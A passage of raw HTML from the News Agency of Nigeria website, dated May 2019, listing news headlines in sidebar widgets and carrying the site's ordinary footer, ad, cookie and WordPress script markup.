id="xtwidget5b8b594861f6d13c6f1a1f31036ad1b1_style" class="widget-instance-style" scoped> #xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title,#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title > a{font-size:18px;line-height:22px;}#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title:not(.bold),#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title:not(.bold) > a{font-weight:300;}#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-excerpt{font-size:14px;line-height:18px;font-weight:400;}@media only screen and (max-width:849px){#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title,#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-title > a{font-size:18px!important;}}@media only screen and (max-width:849px){#xtwidget5b8b594861f6d13c6f1a1f31036ad1b1 .xt-post-excerpt{font-size:14px!important;}} </style><div id="xtwidget5b8b594861f6d13c6f1a1f31036ad1b1" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Latest </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list xt-ajax-wrap posts-list-small-thumbs list" > <li class="post-124197 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-news tag-folklore tag-nigerian-folklore-society-nfs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/entertainment/cultural-preservation-society-tasks-media-on-folklore/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Dr Bukar Usman, President Nigerian Folklore Society" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Cultural preservation: Society tasks media on folklore" target="_self" href="https://www.nan.ng/entertainment/cultural-preservation-society-tasks-media-on-folklore/">Cultural preservation: Society tasks media on folklore</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:48:18+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:48:18+01:00"> </div> </div> </div> </li> <li class="post-124195 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-china tag-huawei tag-u-s" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/huawei-china-threatens-to-retaliate-over-us-sanctions/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Huawei-165x110.jpg" class="attachment-xt-small wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Huawei-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Huawei-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Huawei-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Huawei: China threatens to retaliate over US sanctions" target="_self" href="https://www.nan.ng/news/huawei-china-threatens-to-retaliate-over-us-sanctions/">Huawei: China threatens to retaliate over US sanctions</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:43:43+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:43:43+01:00"> </div> </div> </div> </li> <li class="post-124196 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-gov-akinwunmi-ambode tag-lagos-state" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/lagos-housing-schemes-ready-for-applicants-soon-gov-ambode/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2017/07/Mass-Housing-Plan-showcased-at-the-Abuja-show-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Mass Housing Plan showcased at the Abuja show" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2017/07/Mass-Housing-Plan-showcased-at-the-Abuja-show-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2017/07/Mass-Housing-Plan-showcased-at-the-Abuja-show-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2017/07/Mass-Housing-Plan-showcased-at-the-Abuja-show-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Lagos housing schemes ready for applicants soon &#8211; Gov. Ambode" target="_self" href="https://www.nan.ng/news/lagos-housing-schemes-ready-for-applicants-soon-gov-ambode/">Lagos housing schemes ready for applicants soon &#8211; Gov. Ambode</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:23:57+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:23:57+01:00"> </div> </div> </div> </li> <li class="post-124194 post type-post status-publish format-standard has-post-thumbnail hentry category-agriculture category-news tag-abia tag-farmers tag-herdsmen" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/agriculture/herdsmen-presence-scare-farmers-in-abia/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2016/08/Fulani-herdsmen1-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Herdsman" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2016/08/Fulani-herdsmen1-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2016/08/Fulani-herdsmen1-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2016/08/Fulani-herdsmen1-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Herdsmen presence scare farmers in Abia" target="_self" href="https://www.nan.ng/agriculture/herdsmen-presence-scare-farmers-in-abia/">Herdsmen presence scare farmers in Abia</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:45:53+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:45:53+01:00"> </div> </div> </div> </li> <li class="post-124192 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-9th-assembly-speakership tag-emeka-nwajiuba tag-house-of-representatives" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Nigeria&#039;s House of Reps" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba" target="_self" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/">Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:38:11+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:38:11+01:00"> </div> </div> </div> </li> <li class="post-124193 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-inflation-rate tag-lcci" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/chamber-advises-fg-on-ways-to-reduce-inflation/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2016/10/Muda-Yusuf_director-general-Lagos-Chamber-of-Commerce-and-Industry-s-526x330-165x110.jpg" class="attachment-xt-small wp-post-image" alt="LCCI Boss Muda Yusuf" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2016/10/Muda-Yusuf_director-general-Lagos-Chamber-of-Commerce-and-Industry-s-526x330-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2016/10/Muda-Yusuf_director-general-Lagos-Chamber-of-Commerce-and-Industry-s-526x330-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2016/10/Muda-Yusuf_director-general-Lagos-Chamber-of-Commerce-and-Industry-s-526x330-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Chamber advises FG on ways to reduce inflation" target="_self" href="https://www.nan.ng/news/chamber-advises-fg-on-ways-to-reduce-inflation/">Chamber advises FG on ways to reduce inflation</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:31:55+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:31:55+01:00"> </div> </div> </div> </li> <li class="post-124191 post type-post status-publish format-standard has-post-thumbnail hentry category-banking tag-cbn-governor-godwin-emefiele" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/banking/senate-confirms-emefieles-reappointment-as-cbn-governor/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2018/01/Godwin-Emefiele-on-twitter-handle-My-hands-are-clean-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Godwin Emefiele on twitter handle: My hands are clean" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/01/Godwin-Emefiele-on-twitter-handle-My-hands-are-clean-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/01/Godwin-Emefiele-on-twitter-handle-My-hands-are-clean-270x180.jpg 270w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Senate confirms Emefiele’s reappointment as CBN Governor" target="_self" href="https://www.nan.ng/banking/senate-confirms-emefieles-reappointment-as-cbn-governor/">Senate confirms Emefiele’s reappointment as CBN Governor</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:18:53+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:18:53+01:00"> </div> </div> </div> </li> <li class="post-124188 post type-post status-publish format-standard has-post-thumbnail hentry category-oil-gas" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/oil-gas/lpg-association-commends-fg-for-vat-removal/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2017/04/SON-wants-LPG-plants-in-Nigeria-certified-165x110.jpg" class="attachment-xt-small wp-post-image" alt="SON wants LPG plants in Nigeria certified" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2017/04/SON-wants-LPG-plants-in-Nigeria-certified-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2017/04/SON-wants-LPG-plants-in-Nigeria-certified-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2017/04/SON-wants-LPG-plants-in-Nigeria-certified-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="LPG: Association commends FG for VAT removal" target="_self" href="https://www.nan.ng/oil-gas/lpg-association-commends-fg-for-vat-removal/">LPG: Association commends FG for VAT removal</a> </h5> <meta itemprop="datePublished" content="2019-05-16T11:53:42+01:00"> <meta itemprop="dateModified" content="2019-05-16T11:53:42+01:00"> </div> </div> </div> </li> <li class="post-124187 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-fha tag-transition-management-committee" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/fha-gets-transitional-management-committee/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2018/11/Fashola-165x110.jpg" class="attachment-xt-small wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/11/Fashola-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/11/Fashola-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/11/Fashola-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="FHA gets transitional management committee" target="_self" href="https://www.nan.ng/news/fha-gets-transitional-management-committee/">FHA gets transitional management committee</a> </h5> <meta itemprop="datePublished" content="2019-05-16T11:25:57+01:00"> <meta itemprop="dateModified" content="2019-05-16T11:25:57+01:00"> </div> </div> </div> </li> <li class="post-124186 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-lesser-hajj tag-president-buhari tag-saudi-arabia" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/lesser-hajj-buhari-departs-abuja-for-saudi-arabia/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-165x110.jpg" class="attachment-xt-small wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-300x200.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-768x512.jpg 768w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-1024x682.jpg 1024w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/04/Buhari-2-e1555082531735.jpg 700w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Lesser Hajj: Buhari departs Abuja for Saudi Arabia" target="_self" href="https://www.nan.ng/news/lesser-hajj-buhari-departs-abuja-for-saudi-arabia/">Lesser Hajj: Buhari departs Abuja for Saudi Arabia</a> </h5> <meta itemprop="datePublished" content="2019-05-16T11:20:45+01:00"> <meta itemprop="dateModified" content="2019-05-16T11:20:45+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <div style="text-align: center"> <script type="text/javascript"> ( function() { if (window.CHITIKA === undefined) { window.CHITIKA = { 'units' : [] }; }; var unit = {"calltype":"async[2]","publisher":"nanng","width":300,"height":250,"sid":"Chitika Default"}; var placement_id = window.CHITIKA.units.length; window.CHITIKA.units.push(unit); document.write('<div id="chitikaAdBlock-' + placement_id + '"></div>'); }()); </script> <script type="text/javascript" src="//cdn.chitika.net/getads.js" async></script> </div> </div> </div> </div> </div> </div> </div> </div> <div style="display:none" itemscope="" itemtype="http://schema.org/WebPage"> <meta itemprop="name" content="News Agency of Nigeria (NAN)"> <meta itemprop="description" content=""> </div> </div> <!-- Footer --> <footer class="footer_wrapper hide-on-mobile-menu loaded"> <!-- Footer Widget Zone--> <div class="widget-area footer_widget footer footer__widgets" id="footer-widget-zone-footer"> <hr> <div class="row stretch collapse"> <div class="medium-6 large-6 column"> <aside id="xt-text-2" class="widget xt_widget_text"><div class="xt-widget-header clearfix"><h2 class="widgettitle">No one knows Nigeria like NAN</h2></div> <div class="xt-widget-content clearfix textwidget medium-text"> <p>With substantial reach and mobility across the 36 states of Nigeria, we are always where the news is.</p> <p>For over three decades, NAN has evolved an efficient and effective news gathering network of professional correspondents and world class information gathering system for credible , unbiased and authoritative news as it breaks.<br /> <div class="vc_xt_widget_networks wpb_content_element"><div class="widget xt_widget_networks "> <!-- social-networks --> <div class="xt-widget-content clearfix"> <ul class="social-networks"> <li onmouseover="this.style.backgroundColor='#3c5a9b';" onmouseout="this.style.backgroundColor='';"> <a target="_blank" href="https://www.facebook.com/News-Agency-of-Nigeria-160776271020000"> <i class="fa fa-facebook" title="Facebook"></i> </a> </li> <li onmouseover="this.style.backgroundColor='#1fc1f1';" onmouseout="this.style.backgroundColor='';"> <a target="_blank" href="https://twitter.com/nanonlineng"> <i class="fa fa-twitter" title="Twitter"></i> </a> </li> <li onmouseover="this.style.backgroundColor='#cc181e';" onmouseout="this.style.backgroundColor='';"> <a target="_blank" href="https://www.youtube.com/channel/UC4_wKYII2PKPomxql2jfKgg"> <i class="fa fa-youtube" title="YouTube"></i> </a> </li> <li onmouseover="this.style.backgroundColor='#007bb9';" onmouseout="this.style.backgroundColor='';"> <a target="_blank" href="http://linkedin.com"> <i class="fa fa-linkedin" title="Linkedin"></i> </a> </li> <li onmouseover="this.style.backgroundColor='';" onmouseout="this.style.backgroundColor='';"> <a target="_blank" href="https://plus.google.com/b/104642377828679477053/"> <i class="fa fa-google-plus" title="Google Plus"></i> </a> </li> </ul> </div> </div></div></p> </div> </aside> </div> <div class="medium-3 large-3 column"> <aside id="nav_menu-2" class="widget widget_nav_menu"><h3 class="widgettitle">FYI</h3><div class="menu-footer-category-menu-container"><ul id="menu-footer-category-menu" class="menu"><li id="menu-item-50218" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50218"><a href="https://www.nan.ng/about-us/">About Us</a></li> <li id="menu-item-50219" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50219"><a href="https://www.nan.ng/contact-us/">Contact Us</a></li> </ul></div></aside> </div> <div class="medium-3 large-3 column"> <aside class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgete164c154c0338d50b2744bbc7dfd92f8_style" class="widget-instance-style" scoped> #xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title,#xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title > a{font-size:14px;line-height:22px;}#xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title:not(.bold),#xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title:not(.bold) > a{font-weight:400;}@media only screen and (max-width:849px){#xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title,#xtwidgete164c154c0338d50b2744bbc7dfd92f8 .xt-post-title > a{font-size:14px;}} </style><div id="xtwidgete164c154c0338d50b2744bbc7dfd92f8" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Popular Posts </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list xt-ajax-wrap posts-list-small-thumbs list" > <li class="post-123360 post type-post status-publish format-standard has-post-thumbnail hentry category-environment-2 category-news tag-mudslides tag-president-muhammadu-buhari tag-south-africa" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/environment-2/mudslides-buhari-condoles-with-s-africa-over-loss-of-lives/"> <img itemprop="image" alt="Buhari-3-e1551965275910-260x207.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/03/Buhari-3-e1551965275910-260x207.jpg" width="260" height="207" class="wp-post-image wp-featured-image"> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Mudslides: Buhari condoles with S/Africa over loss of lives" target="_self" href="https://www.nan.ng/environment-2/mudslides-buhari-condoles-with-s-africa-over-loss-of-lives/">Mudslides: Buhari condoles with S/Africa over loss of lives</a> </h5> <meta itemprop="datePublished" content="2019-05-05T06:08:54+01:00"> <meta itemprop="dateModified" content="2019-05-05T06:08:54+01:00"> </div> </div> </div> </li> <li class="post-62016 post type-post status-publish format-standard has-post-thumbnail hentry category-opinion tag-criminal-libel tag-femi-falana tag-libel-laws" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/opinion/falana-illegality-of-criminal-libel-in-nigeria/"> <img itemprop="image" alt="Falana-260x207.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2016/09/Falana-260x207.jpg" width="260" height="207" class="wp-post-image wp-featured-image"> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Falana: Illegality of criminal libel in Nigeria" target="_self" href="https://www.nan.ng/opinion/falana-illegality-of-criminal-libel-in-nigeria/">Falana: Illegality of criminal libel in Nigeria</a> </h5> <meta itemprop="datePublished" content="2019-04-16T23:09:06+01:00"> <meta itemprop="dateModified" content="2019-04-17T07:01:35+01:00"> </div> </div> </div> </li> <li class="post-122168 post type-post status-publish format-standard has-post-thumbnail hentry category-metro category-news tag-nigerian-robbers tag-uae" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/8-nigerian-atm-robbers-sentenced-to-death-in-uae/"> <img itemprop="image" alt="The-five-Nigerians-arrested-in-Dubai-for-robbing-a-bureau-de-change--260x207.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/04/The-five-Nigerians-arrested-in-Dubai-for-robbing-a-bureau-de-change--260x207.jpg" width="260" height="207" class="wp-post-image wp-featured-image"> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="in_widget column left last small-8"> <div class="meta side default-meta"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="8 Nigerian ATM robbers sentenced to death in UAE" target="_self" href="https://www.nan.ng/news/8-nigerian-atm-robbers-sentenced-to-death-in-uae/">8 Nigerian ATM robbers sentenced to death in UAE</a> </h5> <meta itemprop="datePublished" content="2019-04-18T23:02:39+01:00"> <meta itemprop="dateModified" content="2019-04-18T23:09:50+01:00"> </div> </div> </div> </li> </ul> </div></div></div></aside> </div> </div> </div> <!-- End Footer Widget Zone--> <div class="subfooter has-back-to-top has-menu-left has-copyright-right"> <div class="row"> <div class="large-12 column"> <a id="back-to-top" class="subfooter-back-to-top right" href="#" > <i class="fa fa-caret-up"></i> <span>Back to top</span> </a> <div class="subfooter-copyright inline right"> <p>Copyright © 2016 News Agency of Nigeria. Powered by <a href="http://metricinternet.com/" target="_blank">Metric Internet</a></p> </div> </div> </div> </div> </footer> <a class="exit-off-canvas"></a> </div> <!-- End Main Content and Sidebar --> </div> </div> <div style="display:none"> </div> <script language="javascript"> (function(){ if( document.cookie.indexOf('xt_retina') == -1){ var date = new Date(); date.setTime( date.getTime() + 3600000 ); var is_retina = '0'; if('devicePixelRatio' in window && window.devicePixelRatio == 2) { is_retina = '1'; } document.cookie = 'xt_retina='+is_retina+';' + ' expires=' + date.toUTCString() +'; path=/'; } })(); </script> <div id="ajax-login-register-dialog" class="ajax-login-register-container loading" title="Register" data-security="ceefaf4078" style="display: none;"> <div id="ajax-login-register-target" class="ajax-login-register-dialog"> <div class="xt-spinner-wrap "> <div class="xt-spinner sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div> </div> </div><div id="ajax-login-register-login-dialog" class="ajax-login-register-container loading" title="Login" data-security="618ad4318e" style="display:none;"> <div id="ajax-login-register-login-target" class="ajax-login-register-login-dialog"> <div class="xt-spinner-wrap "> <div class="xt-spinner sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div> </div> </div> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/likes/js/xt_likes.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/jquery-inview/jquery.inview.min.js' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var ss_vars = {"ajaxurl":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php?lang=","imgpath":"https:\/\/www.nan.ng\/wp-content\/themes\/nantheme\/lib\/modules\/social-share\/img"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/social-share/js/xt-socialshare.min.js?ver=1.0.0' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var _ajax_login_settings = {"ajaxurl":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php","redirect":"https:\/\/www.nan.ng\/","dialog_width":"565","match_error":"Passwords do not match.","is_user_logged_in":"0","wp_logout_url":"https:\/\/www.nan.ng\/wp-login.php?action=logout&redirect_to=https%3A%2F%2Fwww.nan.ng&_wpnonce=0940f38054","logout_text":"Logout","close_text":"Close"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/scripts.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/login.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/register.min.js?ver=5.1.1' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var impression_object = {"ajax_url":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var click_object = {"ajax_url":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' 